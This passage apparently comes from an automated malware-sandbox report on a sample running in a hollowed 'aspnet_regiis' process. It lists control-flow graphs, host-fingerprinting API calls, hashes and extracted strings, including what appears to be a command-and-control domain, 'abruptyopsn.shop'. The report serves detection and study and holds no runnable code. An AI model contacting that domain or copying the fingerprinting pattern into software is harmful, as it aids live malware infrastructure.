                                                                                          control_flow_graph 319 317df42-317df67 call 3179770 CoUninitialize 322 317df70-317df96 319->322 322->322 323 317df98-317dfab 322->323 324 317dfb0-317dfc2 323->324 324->324 325 317dfc4-317e007 324->325 326 317e010-317e065 325->326 326->326 327 317e067-317e071 326->327 328 317e073-317e076 327->328 329 317e08b-317e09c 327->329 330 317e080-317e089 328->330 331 317e09e-317e09f 329->331 332 317e0ab-317e0b6 329->332 330->329 330->330 333 317e0a0-317e0a9 331->333 334 317e0cb-317e0d6 332->334 335 317e0b8-317e0b9 332->335 333->332 333->333 337 317e0eb-317e0f3 334->337 338 317e0d8-317e0d9 334->338 336 317e0c0-317e0c9 335->336 336->334 336->336 340 317e0f5-317e0f6 337->340 341 317e10b-317e117 337->341 339 317e0e0-317e0e9 338->339 339->337 339->339 342 317e100-317e109 340->342 343 317e131-317e1e7 341->343 344 317e119-317e11b 341->344 342->341 342->342 346 317e1f0-317e21f 343->346 345 317e120-317e12d 344->345 345->345 347 317e12f 345->347 346->346 348 317e221-317e23f 346->348 347->343 349 317e240-317e252 348->349 349->349 350 317e254-317e271 call 317b7f0 349->350 352 317e276-317e290 350->352
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3389532539.0000000003171000.00000020.00000400.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3389516195.0000000003170000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389587692.00000000031B5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389606780.00000000031C3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_3170000_aspnet_regiis.jbxd
                                                                                          Similarity
                                                                                          • API ID: Uninitialize
                                                                                          • String ID: 1`2$@V$FS$L`/s$OL$S`/s$\[HK$abruptyopsn.shop$~q
                                                                                          • API String ID: 3861434553-3593189232
                                                                                          • Opcode ID: 31627f79e15bfae8ba415d678f5e907fe7efec83b62f67f6ab7578ab09b8aa80
                                                                                          • Instruction ID: 11bd9723faaca275f11bdd14f6073c903c6fc057ea0c38ff21dfa9113131f835
                                                                                          • Opcode Fuzzy Hash: 31627f79e15bfae8ba415d678f5e907fe7efec83b62f67f6ab7578ab09b8aa80
                                                                                          • Instruction Fuzzy Hash: 5A91E6B4605B828FD31ACF3985A0262FFF2BF5A20471C86DCD0D64B755C735A456CBA1

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 357 319ce11-319ce2b 358 319ce30-319ce56 357->358 358->358 359 319ce58-319ce5f 358->359 360 319ce7b-319d17e 359->360 361 319ce61-319ce65 359->361 364 319d180-319d1a1 360->364 362 319ce70-319ce79 361->362 362->360 362->362 364->364 365 319d1a3-319d1aa 364->365 366 319d1bb-319d1c7 365->366 367 319d1ac 365->367 369 319d1c9-319d1cb 366->369 370 319d1e1-319d205 call 31af260 366->370 368 319d1b0-319d1b9 367->368 368->366 368->368 372 319d1d0-319d1dd 369->372 373 319d20a-319d23f GetPhysicallyInstalledSystemMemory 370->373 372->372 374 319d1df 372->374 375 319d240-319d273 373->375 374->370 375->375 376 319d275-319d2af call 318e430 375->376 379 319d2b0-319d2d4 376->379 379->379 380 319d2d6-319d2dd 379->380 381 319d2fb-319d303 380->381 382 319d2df-319d2e3 380->382 384 319d31b-319d328 381->384 385 319d305-319d306 381->385 383 319d2f0-319d2f9 382->383 383->381 383->383 387 319d34b-319d39f 384->387 388 319d32a-319d331 384->388 386 319d310-319d319 385->386 386->384 386->386 389 319d3a0-319d3c5 387->389 390 319d340-319d349 388->390 389->389 391 319d3c7-319d3ce 389->391 390->387 390->390 392 319d3eb-319d3f8 391->392 393 319d3d0-319d3d4 391->393 395 319d41b-319d4d2 392->395 396 319d3fa-319d401 392->396 394 319d3e0-319d3e9 393->394 394->392 394->394 397 319d410-319d419 396->397 397->395 397->397
                                                                                          APIs
                                                                                          • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0319D215
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3389532539.0000000003171000.00000020.00000400.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3389516195.0000000003170000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389587692.00000000031B5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389606780.00000000031C3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_3170000_aspnet_regiis.jbxd
                                                                                          Similarity
                                                                                          • API ID: InstalledMemoryPhysicallySystem
                                                                                          • String ID: 'x1;$/CWk$CV,^$gue3$~|[g$~|[g
                                                                                          • API String ID: 3960555810-2508064178
                                                                                          • Opcode ID: 08e4fa0786fea57a58fb3f8712c6995af501460ea0c8a5f22f84c54924b427d6
                                                                                          • Instruction ID: 008fb0ffd9a5ea253f7e78cced612f6b073ee06b6229e3e9fafcb5b3fb24855b
                                                                                          • Opcode Fuzzy Hash: 08e4fa0786fea57a58fb3f8712c6995af501460ea0c8a5f22f84c54924b427d6
                                                                                          • Instruction Fuzzy Hash: 0BA1C57050C3D18BDB39CF2994503ABBFD1AF9B305F0889AED0D99B286D7358146CB66

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 398 319d150-319d17e call 31a2b10 call 3178080 404 319d180-319d1a1 398->404 404->404 405 319d1a3-319d1aa 404->405 406 319d1bb-319d1c7 405->406 407 319d1ac 405->407 409 319d1c9-319d1cb 406->409 410 319d1e1-319d23f call 31af260 GetPhysicallyInstalledSystemMemory 406->410 408 319d1b0-319d1b9 407->408 408->406 408->408 412 319d1d0-319d1dd 409->412 415 319d240-319d273 410->415 412->412 414 319d1df 412->414 414->410 415->415 416 319d275-319d2af call 318e430 415->416 419 319d2b0-319d2d4 416->419 419->419 420 319d2d6-319d2dd 419->420 421 319d2fb-319d303 420->421 422 319d2df-319d2e3 420->422 424 319d31b-319d328 421->424 425 319d305-319d306 421->425 423 319d2f0-319d2f9 422->423 423->421 423->423 427 319d34b-319d39f 424->427 428 319d32a-319d331 424->428 426 319d310-319d319 425->426 426->424 426->426 429 319d3a0-319d3c5 427->429 430 319d340-319d349 428->430 429->429 431 319d3c7-319d3ce 429->431 430->427 430->430 432 319d3eb-319d3f8 431->432 433 319d3d0-319d3d4 431->433 435 319d41b-319d4d2 432->435 436 319d3fa-319d401 432->436 434 319d3e0-319d3e9 433->434 434->432 434->434 437 319d410-319d419 436->437 437->435 437->437
                                                                                          APIs
                                                                                          • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0319D215
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3389532539.0000000003171000.00000020.00000400.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3389516195.0000000003170000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389587692.00000000031B5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389606780.00000000031C3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_3170000_aspnet_regiis.jbxd
                                                                                          Similarity
                                                                                          • API ID: InstalledMemoryPhysicallySystem
                                                                                          • String ID: 'x1;$/CWk$/CWk$CV,^$gue3$~|[g
                                                                                          • API String ID: 3960555810-310644163
                                                                                          • Opcode ID: 5960c6885ebf061e1faca7ffd649c58c64bdb0deef5076ea633f62d8d6cde2a0
                                                                                          • Instruction ID: 34b7a1dd3f00a540786e7a70da5e3f85325bb7b3e8863cb74fdf988c54c1412e
                                                                                          • Opcode Fuzzy Hash: 5960c6885ebf061e1faca7ffd649c58c64bdb0deef5076ea633f62d8d6cde2a0
                                                                                          • Instruction Fuzzy Hash: 1391D77050C3D18BD73ACF2994503ABBBE1AF9F305F0889AED0D99B286D7354146CB66

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • GetCurrentProcessId.KERNEL32 ref: 031786F4
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 031786FE
                                                                                          • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 031787E4
                                                                                          • GetForegroundWindow.USER32 ref: 03178891
                                                                                          • ExitProcess.KERNEL32 ref: 03178969
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3389532539.0000000003171000.00000020.00000400.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3389516195.0000000003170000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389587692.00000000031B5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389606780.00000000031C3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_3170000_aspnet_regiis.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                          • String ID:
                                                                                          • API String ID: 4063528623-0
                                                                                          • Opcode ID: 5e17c00f7821dcd7652c018b57547e99b3a37960f8bb810b422915f258311062
                                                                                          • Instruction ID: be361fc65d9ec616548dcf13e21c98b0f53319ee023f3d54de055641860f4dc1
                                                                                          • Opcode Fuzzy Hash: 5e17c00f7821dcd7652c018b57547e99b3a37960f8bb810b422915f258311062
                                                                                          • Instruction Fuzzy Hash: 70512876B047044FC318FEB8DC46359B6E79BC8210F0E853DA9A9EB395FA788C458791

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 604 31a41b0-31a4291 call 3184240 GetSystemMetrics * 2 612 31a4298-31a4329 604->612
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3389532539.0000000003171000.00000020.00000400.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3389516195.0000000003170000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389587692.00000000031B5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389606780.00000000031C3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_3170000_aspnet_regiis.jbxd
                                                                                          Similarity
                                                                                          • API ID: MetricsSystem
                                                                                          • String ID:
                                                                                          • API String ID: 4116985748-3916222277
                                                                                          • Opcode ID: da488fa449ef42ca8e95ac8a5cafff9568d8eb0083adc2d82308d44fde10b48b
                                                                                          • Instruction ID: 3b3e85b7fe9523e02d31e712ba743c3f40fb85d3c2450273ffa66a2e89d18fad
                                                                                          • Opcode Fuzzy Hash: da488fa449ef42ca8e95ac8a5cafff9568d8eb0083adc2d82308d44fde10b48b
                                                                                          • Instruction Fuzzy Hash: 345191B4E142089FCB44EFACD98569DBBF0BB4C310F108529E498E7354E734A994CF92

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 648 3183756-3183758 649 318375a-318375c 648->649 650 318377e-3183781 648->650 649->650 651 318394c-3183954 650->651 652 3183787-318378c 650->652 654 3183961-3183966 651->654 655 318395c call 31af260 651->655 656 3183b81-3183c23 call 3184240 call 31af260 652->656 657 3183792 652->657 658 3183968-318396a 654->658 659 318396c-31839a7 CreateThread 654->659 655->654 690 3183c2a-3183c5a 656->690 691 3183c25 656->691 664 3183de6-3183dfa call 31abd90 657->664 658->659 662 3183b7c 659->662 663 31839ad-31839df 659->663 662->664 666 31839e1-31839e4 663->666 674 3183dfc-3183e01 call 3178080 664->674 675 3183e06-3183e09 664->675 669 3183a2a-3183a31 666->669 670 31839e6-3183a28 666->670 672 3183a33-3183a39 669->672 670->666 676 3183a3b 672->676 677 3183a3d-3183a50 672->677 674->675 679 3183e0b-3183e13 call 3178080 675->679 680 3183e15-3183e1e 675->680 682 3183aa4-3183ac6 676->682 683 3183a52 677->683 684 3183a54-3183a5a 677->684 679->680 693 3183ac8-3183acb 682->693 689 3183a98-3183a9b 683->689 684->689 692 3183a5c-3183a96 call 31ad810 684->692 698 3183a9d 689->698 699 3183a9f-3183aa2 689->699 696 3183c5c-3183c5f 690->696 691->664 692->689 694 3183b0b-3183b0f 693->694 695 3183acd-3183b09 693->695 700 3183b11-3183b17 694->700 695->693 701 3183c9f-3183ca3 696->701 702 3183c61-3183c9d 696->702 698->682 699->672 704 3183b19 700->704 705 3183b1b-3183b2e 700->705 706 3183ca5-3183cab 701->706 702->696 707 3183b72-3183b7a 704->707 708 3183b30 705->708 709 3183b32-3183b38 705->709 710 3183cad 706->710 711 3183caf-3183cc1 706->711 707->662 712 3183b66-3183b69 708->712 713 3183b3a 709->713 714 3183b3c-3183b64 call 31ad810 709->714 715 3183d00-3183d30 710->715 716 3183cc3 711->716 717 3183cc5-3183ccb 711->717 723 3183b6b 712->723 724 3183b6d-3183b70 712->724 713->712 714->712 721 3183d32-3183d35 715->721 718 3183cf4-3183cf7 716->718 719 3183ccd 717->719 720 3183ccf-3183cef call 31ad810 717->720 726 3183cf9 718->726 727 3183cfb-3183cfe 718->727 719->718 720->718 728 3183d75-3183d7b 721->728 729 3183d37-3183d73 721->729 723->707 724->700 726->715 727->706 731 3183d7f-3183d85 728->731 729->721 732 3183d89-3183d9b 731->732 733 3183d87 731->733 735 3183d9d 732->735 736 3183d9f-3183da5 732->736 734 3183de2 733->734 734->664 739 3183dce-3183dd1 735->739 737 3183da9-3183dc9 call 31ad810 736->737 738 3183da7 736->738 737->739 738->739 741 3183dd9-3183de0 739->741 742 3183dd3-3183dd7 739->742 741->731 742->734
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3389532539.0000000003171000.00000020.00000400.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3389516195.0000000003170000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389587692.00000000031B5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389606780.00000000031C3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_3170000_aspnet_regiis.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: D
                                                                                          • API String ID: 0-2746444292
                                                                                          • Opcode ID: d21653fa7544721323fcc262d5cf60471f21f5dfe8ae09bf77a6829c394699ea
                                                                                          • Instruction ID: 74ba914844db82628fcb79ca8bb2a803ad01de5448fea35987bf3e8c82973f4f
                                                                                          • Opcode Fuzzy Hash: d21653fa7544721323fcc262d5cf60471f21f5dfe8ae09bf77a6829c394699ea
                                                                                          • Instruction Fuzzy Hash: 1CD1CE7D60D3808BD328EB28C4943AABBD1AF88714F1D8D2DD8E587391D7758485CF56
                                                                                          APIs
                                                                                          • FreeLibrary.KERNEL32(?), ref: 0319C635
                                                                                          • GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0319E6D4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3389532539.0000000003171000.00000020.00000400.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3389516195.0000000003170000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389587692.00000000031B5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389606780.00000000031C3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_3170000_aspnet_regiis.jbxd
                                                                                          Similarity
                                                                                          • API ID: ComputerFreeLibraryName
                                                                                          • String ID:
                                                                                          • API String ID: 2904949787-0
                                                                                          • Opcode ID: 58f6597ca551c070ae5902d258fa18d024cb3bdab22c184a480dd7bf9cbd7493
                                                                                          • Instruction ID: d69f463c6fce2790c063f77ac650a58029f49861e697990a9a47c93213b27a0f
                                                                                          • Opcode Fuzzy Hash: 58f6597ca551c070ae5902d258fa18d024cb3bdab22c184a480dd7bf9cbd7493
                                                                                          • Instruction Fuzzy Hash: AC31F83561C28197DB2DDF39D4213FBBBE5AB9A300F58556ED0CAD7291DB3488018761
                                                                                          APIs
                                                                                          • FreeLibrary.KERNEL32(?), ref: 0319C635
                                                                                          • GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0319E6D4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3389532539.0000000003171000.00000020.00000400.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3389516195.0000000003170000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389587692.00000000031B5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389606780.00000000031C3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_3170000_aspnet_regiis.jbxd
                                                                                          Similarity
                                                                                          • API ID: ComputerFreeLibraryName
                                                                                          • String ID:
                                                                                          • API String ID: 2904949787-0
                                                                                          • Opcode ID: c9ed6f9b08cdbdbd742e34b9d8a72d3da960acb137cd8d08bf03a44a1ad90a6a
                                                                                          • Instruction ID: 928c1d4c858a8e3d2ed5eb33d8b846948a5bd6a1d5c6da073b1190d94fbfae50
                                                                                          • Opcode Fuzzy Hash: c9ed6f9b08cdbdbd742e34b9d8a72d3da960acb137cd8d08bf03a44a1ad90a6a
                                                                                          • Instruction Fuzzy Hash: ED210735A1824087DB2CDF35D4223BBBAE6AB8A300F59957ED08AD7294DB3488018761
                                                                                          APIs
                                                                                          • GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0319E6D4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3389532539.0000000003171000.00000020.00000400.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3389516195.0000000003170000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389587692.00000000031B5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389606780.00000000031C3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_3170000_aspnet_regiis.jbxd
                                                                                          Similarity
                                                                                          • API ID: ComputerName
                                                                                          • String ID:
                                                                                          • API String ID: 3545744682-0
                                                                                          • Opcode ID: d8b2d383141aef94e25c9dfb2ec14ca9302ed8ecea6770ca7f2ac60b1b6db905
                                                                                          • Instruction ID: e97527c5e6b7d781c2ec3a084220963afbb9b946b7fffbebcab01f5614333542
                                                                                          • Opcode Fuzzy Hash: d8b2d383141aef94e25c9dfb2ec14ca9302ed8ecea6770ca7f2ac60b1b6db905
                                                                                          • Instruction Fuzzy Hash: D7212836A1864087D72CDF39D4223FBBBE5AB8A300F58957ED18AD7294DB3488018761
                                                                                          APIs
                                                                                          • GetForegroundWindow.USER32 ref: 031AD99F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3389532539.0000000003171000.00000020.00000400.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3389516195.0000000003170000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389587692.00000000031B5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389606780.00000000031C3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_3170000_aspnet_regiis.jbxd
                                                                                          Similarity
                                                                                          • API ID: ForegroundWindow
                                                                                          • String ID:
                                                                                          • API String ID: 2020703349-0
                                                                                          • Opcode ID: d6918d45f358db2b22a77d9ee6f1327acb480c1f9d58597bd355fe7470abc7fc
                                                                                          • Instruction ID: 4a55d7882274e5857007888c6a6ad04637e68570452461d19f07390cd69d557c
                                                                                          • Opcode Fuzzy Hash: d6918d45f358db2b22a77d9ee6f1327acb480c1f9d58597bd355fe7470abc7fc
                                                                                          • Instruction Fuzzy Hash: 07F0ECB8A087808BD708EF3CF4666A77BF4D75A305F042C68D282D7256F736C8528B12
                                                                                          APIs
                                                                                          • LdrInitializeThunk.NTDLL(031B0AEE,00000002,00000018,?,?,00000018,?,?,?), ref: 031AD83E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3389532539.0000000003171000.00000020.00000400.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3389516195.0000000003170000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389587692.00000000031B5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389606780.00000000031C3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_3170000_aspnet_regiis.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                          • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                          • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                          • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                          APIs
                                                                                          • GetUserDefaultUILanguage.KERNELBASE ref: 031A735F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3389532539.0000000003171000.00000020.00000400.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3389516195.0000000003170000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389587692.00000000031B5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389606780.00000000031C3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_3170000_aspnet_regiis.jbxd
                                                                                          Similarity
                                                                                          • API ID: DefaultLanguageUser
                                                                                          • String ID:
                                                                                          • API String ID: 95929093-3916222277
                                                                                          • Opcode ID: 695f5439a89faac36057e2bacc82dfbc7ec0a36e46461c10cadfd9904b218a85
                                                                                          • Instruction ID: d41ca2704c04e32551db3ec24eae359c8e14436b84626c7fd804b99c2518c47a
                                                                                          • Opcode Fuzzy Hash: 695f5439a89faac36057e2bacc82dfbc7ec0a36e46461c10cadfd9904b218a85
                                                                                          • Instruction Fuzzy Hash: 4E215EB5E052548FCB19DB6CC8566DDBBF1AF5A304F0940ADD88DDB380C6745A84CF52
                                                                                          APIs
                                                                                          • CoInitializeEx.OLE32(00000000,00000002), ref: 0317CBFA
                                                                                          • CoInitializeEx.COMBASE(00000000,00000002), ref: 0317CD45
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3389532539.0000000003171000.00000020.00000400.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3389516195.0000000003170000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389587692.00000000031B5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389606780.00000000031C3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_3170000_aspnet_regiis.jbxd
                                                                                          Similarity
                                                                                          • API ID: Initialize
                                                                                          • String ID:
                                                                                          • API String ID: 2538663250-0
                                                                                          • Opcode ID: f335da738b9d8bd4da365ee1d88ce8d4c2768ea95cdc9ef5096e6f6348b89820
                                                                                          • Instruction ID: 16dcbbe7d52429b8c9702640264427fd75977275bf309a38e62c25083112d920
                                                                                          • Opcode Fuzzy Hash: f335da738b9d8bd4da365ee1d88ce8d4c2768ea95cdc9ef5096e6f6348b89820
                                                                                          • Instruction Fuzzy Hash: 0041D7B4910B00AFD370AF398A0B7127EF4AB05250F504B1DF9EA866D4E631A4198BD3
                                                                                          APIs
                                                                                          • GetComputerNameExA.KERNELBASE(00000005,?,00000100), ref: 0319C9F5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3389532539.0000000003171000.00000020.00000400.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3389516195.0000000003170000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389587692.00000000031B5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389606780.00000000031C3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_3170000_aspnet_regiis.jbxd
                                                                                          Similarity
                                                                                          • API ID: ComputerName
                                                                                          • String ID:
                                                                                          • API String ID: 3545744682-0
                                                                                          • Opcode ID: 8488db808b8c3ba923823843e05ca30b380b869dd21e0d151cd624853b32fbae
                                                                                          • Instruction ID: 09ca67f2ce3378925fd1d7dddb031a6e1e7964a60672fbfda4534b97bbe1135c
                                                                                          • Opcode Fuzzy Hash: 8488db808b8c3ba923823843e05ca30b380b869dd21e0d151cd624853b32fbae
                                                                                          • Instruction Fuzzy Hash: 9B2108762483814BDB24CF79C5947ABB7DAAFD9740F09456EC4C9C7241DB748805C762
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3389532539.0000000003171000.00000020.00000400.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3389516195.0000000003170000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389587692.00000000031B5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389606780.00000000031C3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_3170000_aspnet_regiis.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateThread
                                                                                          • String ID:
                                                                                          • API String ID: 2422867632-0
                                                                                          • Opcode ID: 6a4c6116a5b957650b7e532744ca2ae1f0945fca077dd42bdcf5fb98b1691495
                                                                                          • Instruction ID: de01842daf2af5f1853ca0172886550878441d31bcc98fc037c7c7d6d1a8abba
                                                                                          • Opcode Fuzzy Hash: 6a4c6116a5b957650b7e532744ca2ae1f0945fca077dd42bdcf5fb98b1691495
                                                                                          • Instruction Fuzzy Hash: 6C21D2BAA0D3804BE358DB38C49439BBBD2ABD8314F1CC96DD0D887285DBB544068B53
                                                                                          APIs
                                                                                          Memory Dump Source
